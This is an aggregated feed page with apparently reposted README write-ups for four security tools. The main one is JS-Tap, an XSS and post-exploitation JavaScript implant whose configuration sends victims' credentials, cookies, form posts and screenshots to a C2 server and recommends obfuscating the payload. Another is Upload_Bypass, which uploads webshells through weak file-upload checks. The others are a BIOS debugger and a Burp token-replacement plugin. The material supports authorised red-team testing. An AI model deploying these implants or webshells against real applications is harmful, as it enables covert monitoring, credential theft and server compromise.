FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application

By: Zion3R


JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


Changelogs

Major changes are documented in the project Announcements:
https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

Demo

You can read the original blog post about JS-Tap here:
javascript-for-red-teams">https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

Short demo from ShmooCon of JS-Tap version 1:
https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
https://youtu.be/aWvNLJnqObQ?t=11719

A demo can also be seen in this webinar:
https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

Upgrade warning

I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

Introduction

JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

The example JS-Tap payload is contained in the telemlib.js file in the payloads directory, however any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using in an engagement strongly consider changing the naming of endpoints, stripping comments, and highly obfuscating the payload.

Make sure you review the configuration section below carefully before using on a publicly exposed server.

Data Collected

  • Client IP address, OS, Browser
  • User inputs (credentials, etc.)
  • URLs visited
  • Cookies (that don't have httponly flag set)
  • Local Storage
  • Session Storage
  • HTML code of pages visited (if feature enabled)
  • Screenshots of pages visited
  • Copy of Form Submissions
  • Copy of XHR API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body
  • Copy of Fetch API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body

Note: ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode only Fetch API can be copied currently.

Operating Modes

The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.

Trap Mode

Trap mode is typically the mode you would use as a XSS payload. Execution of XSS payloads is often fleeting, the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data.

Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. current location). The trap will set when the user visits the login page, and they'll hopefully contine into the authenticated portions of the application inside the iframe trap.

A user refreshing the page will generally break/escape the iframe trap.

Implant Mode

Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

Installation and Start

Requires python3. A large number of dependencies are required for the jsTapServer, you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

Example:

mkdir jsTapEnvironment
python3 -m venv jsTapEnvironment
source jsTapEnvironment/bin/activate
cd jsTapEnvironment
git clone https://github.com/hoodoer/JS-Tap
cd JS-Tap
pip3 install -r requirements.txt

run in debug/single thread mode:
python3 jsTapServer.py

run with gunicorn multithreaded (production use):
./jstapRun.sh

A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

Note that on Mac I also had to install libmagic outside of python.

brew install libmagic

Playing with JS-Tap locally is fine, but to use in a proper engagment you'll need to be running JS-Tap on publicly accessible VPS and setup JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

Configuration

JS-Tap Server Configuration

Debug/Single thread config

If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

Proxy Mode

For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.

When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.

Data Directory

The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.

Server Port

To change the server port configuration see the last line of jsTapServer.py

app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

Gunicorn Production Configuration

Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGNIX to also use multiple processes so you don't bottleneck on the proxy itself.

At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;

Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.

Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

telemlib.js Configuration

These configuration variables are in the initGlobals() function.

JS-Tap Server Location

You need to configure the payload with the URL of the JS-Tap server it will connect back to.

window.taperexfilServer = "https://127.0.0.1:8444";

Mode

Set to either trap or implant This is set with the variable:

window.taperMode = "trap";
or
window.taperMode = "implant";

Trap Mode Starting Page

Only needed for trap mode. See explanation in Operating Modes section above.
Sets the page the user starts on when the iFrame trap is set.

window.taperstartingPage = "http://targetapp.com/somestartpage";

If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

window.taperstartingPage = window.location.href;

Client Tag

Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served, you can have multiple JS-Tap payloads configured with different modes, start pages, and clien tags.

This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Setup multiple payloads, each with the appropriate configuration for the application its being used against, and add a tag indicating which app the client is running.

window.taperTag = 'whatever';

Custom Payload Tasks

Used to set if clients are checking for Custom Payload tasks, and how often they're checking. The jitter settings Let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.

window.taperTaskCheck        = true;
window.taperTaskCheckDelay = 5000;
window.taperTaskJitterBottom = -2000;
window.taperTaskJitterTop = 2000;

Exfiltrate HTML

true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.

window.taperexfilHTML = true;

Copy Form Submissions

true/false setting on whether to intercept a copy of all form posts.

window.taperexfilFormSubmissions = true;

MonkeyPatch APIs

Enable monkeypatching of XHR and Fetch APIs. This works in trap mode. In implant mode, only Fetch APIs are monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will re-write the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Not that jQuery based network calls will be captured in the XHR API, which jQuery uses under the hood for network calls.

window.monkeyPatchAPIs = true;

Screenshot after API calls

By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.

window.postApiCallScreenshot = true;
window.screenshotDelay = 1000;

JS-Tap Portal

Login with the admin credentials provided by the server script on startup.

Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

Each client has an 'x' button (near the star button). This allows you to delete the session for that client, if they're sending junk or useless data, you can prevent that client from submitting future data.

When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issues, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session in here.

Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.

Custom Payloads

Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

[{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]

The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

To run a payload on a single client user the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

Tools

A few tools are included in the tools subdirectory.

clientSimulator.py

A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

At the top of the script is a numClients variable, set to how many clients you want to simulator. The script will spawn a thread for each, retrieve a client session, and send data in simulating a client.

numClients = 50

You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

apiServer = "https://127.0.0.1:8444"

JS-Tap run using gunicorn scales quite well.

MonkeyPatchApp

A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general.

Run with:

python3 monkeyPatchLab.py

By default this will start the application running on:

https://127.0.0.1:8443

Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js

function injectPayload()
{
document.head.appendChild(Object.assign(document.createElement('script'),
{src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
}

formParser.py

Abandoned tool, is a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.

You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

generateIntelReport.py

No longer working, used before the web UI for JS-Tap. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons, most of it is stored in the datagbase with the exception of exfiltratred HTML code and screenshots.

Contact

@hoodoer
hoodoer@bitwisemunitions.dev



Bread - BIOS Reverse Engineering And Advanced Debugging

By: Zion3R


BREAD (BIOS Reverse Engineering & Advanced Debugging) is an 'injectable' real-mode x86 debugger that can debug arbitrary real-mode code (on real HW) from another PC via serial cable.

Introduction

BREAD emerged from many failed attempts to reverse engineer legacy BIOS. Given that the vast majority -- if not all -- BIOS analysis is done statically using disassemblers, understanding the BIOS becomes extremely difficult, since there's no way to know the value of registers or memory in a given piece of code.

Despite this, BREAD can also debug arbitrary code in real-mode, such as bootable code or DOS programs too.


How it works?

This debugger is divided into two parts: the debugger (written entirely in assembly and running on the hardware being debugged) and the bridge, written in C and running on Linux.

The debugger is the injectable code, written in 16-bit real-mode, and can be placed within the BIOS ROM or any other real-mode code. When executed, it sets up the appropriate interrupt handlers, puts the processor in single-step mode, and waits for commands on the serial port.

The bridge, on the other hand, is the link between the debugger and GDB. The bridge communicates with GDB via TCP and forwards the requests/responses to the debugger through the serial port. The idea behind the bridge is to remove the complexity of GDB packets and establish a simpler protocol for communicating with the machine. In addition, the simpler protocol enables the final code size to be smaller, making it easier for the debugger to be injectable into various different environments.

As shown in the following diagram:

    +---------+ simple packets +----------+   GDB packets  +---------+                                       
| |--------------->| |--------------->| |
| dbg | | bridge | | gdb |
|(real HW)|<---------------| (Linux) |<---------------| (Linux) |
+---------+ serial +----------+ TCP +---------+

Features

By implementing the GDB stub, BREAD has many features out-of-the-box. The following commands are supported:

  • Read memory (via x, dump, find, and relateds)
  • Write memory (via set, restore, and relateds)
  • Read and write registers
  • Single-Step (si, stepi) and continue (c, continue)
  • Breakpoints (b, break)1
  • Hardware Watchpoints (watch and its siblings)2

Limitations

How many? Yes. Since the code being debugged is unaware that it is being debugged, it can interfere with the debugger in several ways, to name a few:

  • Protected-mode jump: If the debugged code switches to protected-mode, the structures for interrupt handlers, etc. are altered and the debugger will no longer be invoked at that point in the code. However, it is possible that a jump back to real mode (restoring the full previous state) will allow the debugger to work again.

  • IDT changes: If for any reason the debugged code changes the IDT or its base address, the debugger handlers will not be properly invoked.

  • Stack: BREAD uses a stack and assumes it exists! It should not be inserted into locations where the stack has not yet been configured.

For BIOS debugging, there are other limitations such as: it is not possible to debug the BIOS code from the very beggining (bootblock), as a minimum setup (such as RAM) is required for BREAD to function correctly. However, it is possible to perform a "warm-reboot" by setting CS:EIP to F000:FFF0. In this scenario, the BIOS initialization can be followed again, as BREAD is already properly loaded. Please note that the "code-path" of BIOS initialization during a warm-reboot may be different from a cold-reboot and the execution flow may not be exactly the same.

Building

Building only requires GNU Make, a C compiler (such as GCC, Clang, or TCC), NASM, and a Linux machine.

The debugger has two modes of operation: polling (default) and interrupt-based:

Polling mode

Polling mode is the simplest approach and should work well in a variety of environments. However, due the polling nature, there is a high CPU usage:

Building

$ git clone https://github.com/Theldus/BREAD.git
$ cd BREAD/
$ make

Interrupt-based mode

The interrupt-based mode optimizes CPU utilization by utilizing UART interrupts to receive new data, instead of constantly polling for it. This results in the CPU remaining in a 'halt' state until receiving commands from the debugger, and thus, preventing it from consuming 100% of the CPU's resources. However, as interrupts are not always enabled, this mode is not set as the default option:

Building

$ git clone https://github.com/Theldus/BREAD.git
$ cd BREAD/
$ make UART_POLLING=no

Usage

Using BREAD only requires a serial cable (and yes, your motherboard has a COM header, check the manual) and injecting the code at the appropriate location.

To inject, minimal changes must be made in dbg.asm (the debugger's src). The code's 'ORG' must be changed and also how the code should return (look for ">> CHANGE_HERE <<" in the code for places that need to be changed).

For BIOS (e.g., AMI Legacy):

Using an AMI legacy as an example, where the debugger module will be placed in the place of the BIOS logo (0x108200 or FFFF:8210) and the following instructions in the ROM have been replaced with a far call to the module:

...
00017EF2 06 push es
00017EF3 1E push ds
00017EF4 07 pop es
00017EF5 8BD8 mov bx,ax -โ” replaced by: call 0xFFFF:0x8210 (dbg.bin)
00017EF7 B8024F mov ax,0x4f02 -โ”˜
00017EFA CD10 int 0x10
00017EFC 07 pop es
00017EFD C3 ret
...

the following patch is sufficient:

diff --git a/dbg.asm b/dbg.asm
index caedb70..88024d3 100644
--- a/dbg.asm
+++ b/dbg.asm
@@ -21,7 +21,7 @@
; SOFTWARE.

[BITS 16]
-[ORG 0x0000] ; >> CHANGE_HERE <<
+[ORG 0x8210] ; >> CHANGE_HERE <<

%include "constants.inc"

@@ -140,8 +140,8 @@ _start:

; >> CHANGE_HERE <<
; Overwritten BIOS instructions below (if any)
- nop
- nop
+ mov ax, 0x4F02
+ int 0x10
nop
nop

It is important to note that if you have altered a few instructions within your ROM to invoke the debugger code, they must be restored prior to returning from the debugger.

The reason for replacing these two instructions is that they are executed just prior to the BIOS displaying the logo on the screen, which is now the debugger, ensuring a few key points:

  • The logo module (which is the debugger) has already been loaded into memory
  • Video interrupts from the BIOS already work
  • The code around it indicates that the stack already exists

Finding a good location to call the debugger (where the BIOS has already initialized enough, but not too late) can be challenging, but it is possible.

After this, dbg.bin is ready to be inserted into the correct position in the ROM.

For DOS

Debugging DOS programs with BREAD is a bit tricky, but possible:

1. Edit dbg.asm so that DOS understands it as a valid DOS program:

  • Set the ORG to 0x100
  • Leave the useful code away from the beginning of the file (times)
  • Set the program output (int 0x20)

The following patch addresses this:

diff --git a/dbg.asm b/dbg.asm
index caedb70..b042d35 100644
--- a/dbg.asm
+++ b/dbg.asm
@@ -21,7 +21,10 @@
; SOFTWARE.

[BITS 16]
-[ORG 0x0000] ; >> CHANGE_HERE <<
+[ORG 0x100]
+
+times 40*1024 db 0x90 ; keep some distance,
+ ; 40kB should be enough

%include "constants.inc"

@@ -140,7 +143,7 @@ _start:

; >> CHANGE_HERE <<
; Overwritten BIOS instructions below (if any)
- nop
+ int 0x20 ; DOS interrupt to exit process
nop

2. Create a minimal bootable DOS environment and run

Create a bootable FreeDOS (or DOS) floppy image containing just the kernel and the terminal: KERNEL.SYS and COMMAND.COM. Also add to this floppy image the program to be debugged and the DBG.COM (dbg.bin).

The following steps should be taken after creating the image:

  • Boot it with bridge already opened (refer to the next section for instructions).
  • Execute DBG.COM.
  • Once execution stops, use GDB to add any desired breakpoints and watchpoints relative to the next process you want to debug. Then, allow the DBG.COM process to continue until it finishes.
  • Run the process that you want to debug. The previously-configured breakpoints and watchpoints should trigger as expected.

It is important to note that DOS does not erase the process image after it exits. As a result, the debugger can be configured like any other DOS program and the appropriate breakpoints can be set. The beginning of the debugger is filled with NOPs, so it is anticipated that the new process will not overwrite the debugger's memory, allowing it to continue functioning even after it appears to be "finished". This allows BREaD to debug other programs, including DOS itself.

Bridge

Bridge is the glue between the debugger and GDB and can be used in different ways, whether on real hardware or virtual machine.

Its parameters are:

Usage: ./bridge [options]
Options:
-s Enable serial through socket, instead of device
-d <path> Replaces the default device path (/dev/ttyUSB0)
(does not work if -s is enabled)
-p <port> Serial port (as socket), default: 2345
-g <port> GDB port, default: 1234
-h This help

If no options are passed the default behavior is:
./bridge -d /dev/ttyUSB0 -g 1234

Minimal recommended usages:
./bridge -s (socket mode, serial on 2345 and GDB on 1234)
./bridge (device mode, serial on /dev/ttyUSB0 and GDB on 1234)

Real hardware

To use it on real hardware, just invoke it without parameters. Optionally, you can change the device path with the -d parameter:

Execution flow:
  1. Connect serial cable to PC
  2. Run bridge (./bridge or ./bridge -d /path/to/device)
  3. Turn on the PC to be debugged
  4. Wait for the message: Single-stepped, you can now connect GDB! and then launch GDB: gdb.

Virtual machine

For use in a virtual machine, the execution order changes slightly:

Execution flow:
  1. Run bridge (./bridge or ./bridge -d /path/to/device)
  2. Open the VM3 (such as: make bochs or make qemu)
  3. Wait for the message: Single-stepped, you can now connect GDB! and then launch GDB: gdb.

In both cases, be sure to run GDB inside the BRIDGE root folder, as there are auxiliary files in this folder for GDB to work properly in 16-bit.

Contributing

BREAD is always open to the community and willing to accept contributions, whether with issues, documentation, testing, new features, bugfixes, typos, and etc. Welcome aboard.

License and Authors

BREAD is licensed under MIT License. Written by Davidson Francis and (hopefully) other contributors.

Footnotes

  1. Breakpoints are implemented as hardware breakpoints and therefore have a limited number of available breakpoints. In the current implementation, only 1 active breakpoint at a time! โ†ฉ

  2. Hardware watchpoints (like breakpoints) are also only supported one at a time. โ†ฉ

  3. Please note that debug registers do not work by default on VMs. For bochs, it needs to be compiled with the --enable-x86-debugger=yes flag. For Qemu, it needs to run with KVM enabled: --enable-kvm (make qemu already does this). โ†ฉ



Upload_Bypass - File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques Covered In Hacktricks

By: Zion3R


Upload_Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.

  • Simplifies the identification and exploitation of vulnerabilities in file upload mechanisms.
  • Leverages bug bounty techniques to maximize testing effectiveness.
  • Enables thorough assessments of web applications.
  • Provides an intuitive and user-friendly interface.
  • Enhances security assessments and helps protect critical systems.

New PoC Video:

Disclaimer

Please note that the use of Upload_Bypass and any actions taken with it are solely at your own risk. The tool is provided for educational and testing purposes only. The developer of Upload_Bypass is not responsible for any misuse, damage, or illegal activities caused by its usage.

While Upload_Bypass aims to assist Pentesters and Bug Hunters in testing file upload mechanisms, it is essential to obtain proper authorization and adhere to applicable laws and regulations before performing any security assessments. Always ensure that you have the necessary permissions from the relevant stakeholders before conducting any testing activities.

The results and findings obtained from using Upload_Bypass should be communicated responsibly and in accordance with established disclosure processes. It is crucial to respect the privacy and integrity of the tested systems and refrain from causing harm or disruption.

By using Upload_Bypass, you acknowledge that the developer cannot be held liable for any consequences resulting from its use. Use the tool responsibly and ethically to promote the security and integrity of web applications.

Features

  1. Webshell mode: The tool will try to upload a Webshell with a random name, and if the user specifies the location of the uploaded file, the tool enters an "Interactive shell".
  2. Eicar mode: The tool will try to upload an Eicar(Anti-Malware test file) instead of a Webshell, and if the user specifies the location of the uploaded file, the tool will check if the file uploaded successfully and exists in the system in order to determine if an Anti-Malware is present on the system.
  3. A directory with the name of the tested host will be created in the Tool's directory upon success, with the results saved in Excel and Text files.

Download:

Download the latest version from Releases page.

Installation:

pip install -r requirements.txt

Limitations:

The tool will not function properly if the file upload mechanism includes CAPTCHA implementation.

Perhaps in the future the tool will include an OCR.

Usage:

Attension

The Tool is compatible exclusively with output file requests generated by Burp Suite.

Before saving the Burp file, replace the file content with the string *content* and filename.ext with the string *filename* and Content-Type header with *mimetype*(only if the tool is not able to recognize it automatically).

How a request should look before the changes:


How it should look after the changes:


If the tool fails to recognize the mime type automatically, you can add *mimetype* in the parameter's value of the Content-Type header.

Options: -h, --help

 show this help message and exit

-b BURP_FILE, --burp-file BURP_FILE

 Required - Read from a Burp Suite file
Usage: -b / --burp-file ~/Desktop/output

-s SUCCESS_MESSAGE, --success SUCCESS_MESSAGE

 Required if -f is not set - Provide the success message when a file is uploaded
Usage: -s /--success 'File uploaded successfully.'

-f FAILURE_MESSAGE, --failure FAILURE_MESSAGE

 Required if -s is not set - Provide a failure message when a file is uploaded
Usage: -f /--failure 'File is not allowed!'

-e FILE_EXTENSION, --extension FILE_EXTENSION

 Required - Provide server backend extension
Usage: -e / --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)

-a ALLOWED_EXTENSIONS, --allowed ALLOWED_EXTENSIONS

 Required - Provide allowed extensions to be uploaded
Usage: -a /--allowed jpeg, png, zip, etc'

-l WEBSHELL_LOCATION, --location WEBSHELL_LOCATION

  Provide a remote path where the WebShell will be uploaded (won't work if the file will be uploaded with a UUID).
Usage: -l / --location /uploads/

-rl NUMBER, --rate-limit NUMBER

  Set rate-limiting with milliseconds between each request.
Usage: -r / --rate-limit 700

-p PROXY_NUM, --proxy PROXY_NUM

  Channel the HTTP requests via proxy client (i.e Burp Suite).
Usage: -p / --proxy http://127.0.0.1:8080

-S, --ssl

  If set, the tool will not validate TLS/SSL certificate.
Usage: -S / --ssl

-c, --continue

  If set, the brute force will continue even if one of the methods gets a hit!
Usage: -C /--continue

-E, --eicar

  If set, an Eicar file(Anti Malware Testfile) will be uploaded only. WebShells will not be uploaded (Suitable for real environments).
Usage: -E / --eicar

-v, --verbose

  If set, details about the test will be printed on the screen
Usage: -v / --verbose

-r, --response

  If set, HTTP response will be printed on the screen
Usage: -r / --response

--version

  Print the current version of the tool.     

--update

  Checks for new updates. If there is a new update, it will be downloaded and updated automatically.     

Examples

Running the tool with Eicar and Bruteforce mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e php -a jpeg --response -v --eicar --continue

Running the tool with Webshell mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e asp -a zip -v

Running the tool with a Proxy client

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e jsp -a png -v --proxy http://127.0.0.1:8080


Ator - Authentication Token Obtain and Replace Extender


The plugin is created to help automated scanning using Burp in the following scenarios:

  1. Access/Refresh token
  2. Token replacement in XML,JSON body
  3. Token replacement in cookies
    The above can be achieved using complex macro, session rules or Custom Extender in some scenarios. The rules become tricky and do not work in scenarios where the replacement text is either JSON, XML.

Key advantages:

  1. We have also achieved in-memory token replacement to avoid duplicate login requests like in both custom extender, macros/session rules.
  2. Easy UX to help obtain data (from response) and replace data (in requests) using regex. This helps achieve complex scenarios where response body is JSON, XML and the request text is also JSON, XML, form data etc.
  3. Scan speed - the scan speed increases considerably because there are no extra login requests. There is something called the "Trigger Request" which is the error condition (also includes regex) when the login requests are triggered. The error condition can include (response code = 401 and body contains "Unauthorized request")

The inspiration for the plugin is from ExtendedMacro plugin: https://github.com/FrUh/ExtendedMacro

Blogs

  1. Authentication Token Obtain and Replace (ATOR)ย Burp Pluginย - Part1 - Single step login sequence and single token extraction
  2. Authentication Token Obtain and Replace (ATOR) Burp Plugin - Part2 - Multi step login sequence and multiple extraction

Getting Started

  1. Install Java and Maven
  2. Clone the repository
  3. Run the "mvn clean install" command in cloned repo of where pom.xml is present
  4. Take the generated jar with dependencies from the target folder

Prerequisites

  1. Make sure java environment is setup in your machine.
  2. Confgure the Burp Suite to listen the Proxy traffic
  3. Configure the java environment from extender tab of BURP

For usage with test application (Install this testing application (Tiredful application) from https://github.com/payatu/Tiredful-API)

Steps

  1. Identify the request which provides the error
  2. Identify the Error Pattern (details in section below)
  3. Obtain the data from the response using regex (see sample regex values)
  4. Replace this data on the request (use same regex as step 3 along with the variable name)

Error Pattern:

Totally there are 4 different ways you can specify the error condition.

  1. Status Code: 401, 400
  2. Error in Body: give any text from the body content (Example: Access token expired)
  3. Error in Header: give any text from header(Example: Unauthorized)
  4. Free Form: use this to give multiple condition (st=400 && bd=Access token expired || hd=Unauthorized)

Regex with samples

  1. Use Authorization: Bearer \w* to match Authorization: Bearer AXXFFPPNSUSSUSSNSUSN
  2. Use Authorization: Bearer ([\w+_-.]*) to match Authorization: Bearer AXX-F+FPPNS.USSUSSNSUSN

Break down into end to end tests

  1. Finding the Invalid request:
    • http://HOST:PORT/api/v1/exams/MQ==/ with invalid Bearer token.
  2. Identifying Error Pattern:
    • The above request will give you 401, here error condition is Status Code = 401
  3. Match regex with request data
    • Authorization: Bearer \w* - this regex will match access token which is passed.
  4. Replacement - How to replace
    • Replace the matched text(step 3 regex) with extracted value (Extraction configuration discussed in below, say varibale name is "token")
    • Authorization: Bearer token - extracted token will be replaced.

Usage with test application

Idea : Record the Tiredful application request in BURP, configure the ATOR extender, check whether token is replaced by ATOR.

  1. Open the testing application in browser which you configured with BURP
    • Generate a token from http://HOST:PORT/handle-user-token/
    • Send the request http://HOST:PORT/api/v1/exams/MQ==/ by passing Authorization Beaer token(get it from above step)
  2. Add the ATOR jar file as a extender in BURP
  3. Right Click on the request(/handle-user-token) in Proxy history and send it to Authentication Token Optain and Replace Extender
  4. Add the new entry in Extraction configuration by selecting the "access_token" value and give name as "token"(it may be any name) Note: For this application,one request is enough to generate a token.Token can also get generated after multiple requests
  5. TRIGGER CONDITION:
    • Macro steps will get executed if the condition is matched.
    • After execution of steps, replace the incoming request by taking values from "Pattern" and "Replacement Area" if specified.
    • For our testing,
      • Error condition is 401(Status Code)
      • Pattern is "Authorization: Bearer \w*" (Specify the regex Pattern how you want to replace with extraction values)
      • Replacement Area is "Authentication: Bearer <NAME which you gave in STEP 4>"
    • Click on "Add" Button.
  6. For this example, one replacement is enough to make the incoming request as valid but you can add mutiple replacement for a single condition.
  7. Hit the invalid request from Repeater and check the req/res flows in either FLOW/Logger++
